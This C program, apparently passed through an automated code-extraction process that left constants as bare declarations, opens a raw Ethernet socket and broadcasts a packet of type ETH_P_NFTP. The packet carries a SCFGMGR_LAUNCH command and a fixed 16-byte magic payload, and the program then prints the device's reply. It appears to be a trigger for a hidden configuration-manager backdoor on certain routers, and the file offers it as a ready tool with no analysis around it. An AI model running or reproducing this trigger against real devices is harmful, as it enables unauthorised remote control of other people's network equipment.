
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


struct sockaddr_ll {int sll_halen; struct raw_packet* sll_addr; int sll_pkttype; int sll_hatype; int sll_ifindex; void* sll_protocol; int sll_family; } ;
struct sockaddr {int dummy; } ;
struct TYPE_4__ {char* ether_shost; void* ether_type; struct raw_packet* ether_dhost; } ;
struct raw_packet {char* payload; TYPE_2__ header; void* payload_len; void* type; } ;
struct TYPE_3__ {char* sa_data; } ;
struct ifreq {int ifr_ifindex; TYPE_1__ ifr_hwaddr; int ifr_name; } ;
typedef int socket_address ;
typedef int packet ;


 int AF_PACKET ;
 int ARPHRD_ETHER ;
 int ETH_ALEN ;
 scalar_t__ ETH_P_ALL ;
 scalar_t__ ETH_P_NFTP ;
 int IFNAMSIZ ;
 int PACKET_OTHERHOST ;
 int PF_PACKET ;
 int SCFGMGR_LAUNCH ;
 int SIOCGIFHWADDR ;
 int SIOCGIFINDEX ;
 int SOCK_RAW ;
 int be16toh (void*) ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 scalar_t__ geteuid () ;
 int getuid () ;
 void* htole16 (int) ;
 void* htons (scalar_t__) ;
 int ioctl (int,int ,struct ifreq*) ;
 int memcpy (char*,char*,int) ;
 int memset (struct raw_packet*,int,int) ;
 scalar_t__ ntohs (void*) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int recvfrom (int,struct raw_packet*,int,int ,int *,int *) ;
 int sendto (int,struct raw_packet*,int,int ,struct sockaddr*,int) ;
 int seteuid (int ) ;
 int socket (int ,int ,void*) ;
 int stderr ;
 int strncpy (int ,char*,int ) ;

int main(int argc, char *argv[])
{
 int sockfd, res, i, len;
 char src_mac[ETH_ALEN];
 struct ifreq iface;
 struct sockaddr_ll socket_address;
    struct raw_packet packet;

    memset(&packet, 0, sizeof(packet));

 if (argc < 2)
 {
  fprintf(stderr, "usage : %s [IFNAME]\n", argv[0]);
  exit(1);
 }

 sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
 if (sockfd == -1)
 {
  if(geteuid() != 0)
  {
   fprintf(stderr, "You should probably run this program as root.\n");
  }
  perror("socket");
  exit(1);
 }
    seteuid(getuid());

 strncpy(iface.ifr_name, argv[1], IFNAMSIZ);
 res = ioctl(sockfd, SIOCGIFHWADDR, &iface);
 if(res < 0)
 {
  perror("ioctl");
  exit(1);
 }
 memcpy(src_mac, iface.ifr_hwaddr.sa_data, ETH_ALEN);


 res = ioctl(sockfd, SIOCGIFINDEX, &iface);
 if(res < 0)
    {
  perror("ioctl");
  exit(1);
 }


    memcpy(packet.header.ether_shost, src_mac, ETH_ALEN);

    memset(packet.header.ether_dhost, 0xFF, ETH_ALEN);

    memcpy(packet.payload, "\x45\xD1\xBB\x33\x9B\x07\xA6\x61\x8B\x21\x14\xDB\xC0\xD7\x78\x3E", 0x10);
    packet.payload_len = htole16(0x10);

    packet.header.ether_type = htons(ETH_P_NFTP);

    packet.type = htole16(SCFGMGR_LAUNCH);

    socket_address.sll_family = PF_PACKET;
    socket_address.sll_protocol = htons(ETH_P_NFTP);
    socket_address.sll_ifindex = iface.ifr_ifindex;
    socket_address.sll_hatype = ARPHRD_ETHER;
    socket_address.sll_pkttype = PACKET_OTHERHOST;

    socket_address.sll_halen = ETH_ALEN;
    memset(socket_address.sll_addr, 0xFF, ETH_ALEN);

    res = sendto(sockfd, &packet, 0x10 + 24, 0, (struct sockaddr *)&socket_address, sizeof(socket_address));
    if (res == -1)
    {
        perror("sendto");
        exit(1);
    }

    do {
        memset(&packet, 0, sizeof(packet));
        res = recvfrom(sockfd, &packet, sizeof(packet), 0, ((void*)0), ((void*)0));
        if (res == -1)
        {
            perror("recvfrom");
            exit(1);
        }
    } while (ntohs(packet.header.ether_type) != ETH_P_NFTP);

    if (res < sizeof(packet) - sizeof(packet.payload))
    {
        fprintf(stderr, "packet is too short: %d bytes\n", res);
        exit(1);
    }

    len = be16toh(packet.payload_len);
    printf("received packet: %d bytes (payload len = %d) from ", res, len);
    for (i = 0; i < ETH_ALEN; i++)
        printf("%02X%c", packet.header.ether_shost[i], i == ETH_ALEN-1 ? '\n' : ':');

    for (i = 0; (i < len) && (i < sizeof(packet.payload)); i++)
    {
        printf("%02X ", packet.payload[i]);
        if ((i+1) % 16 == 0)
            printf("\n");
    }
    printf("\n");
 return 0;
}
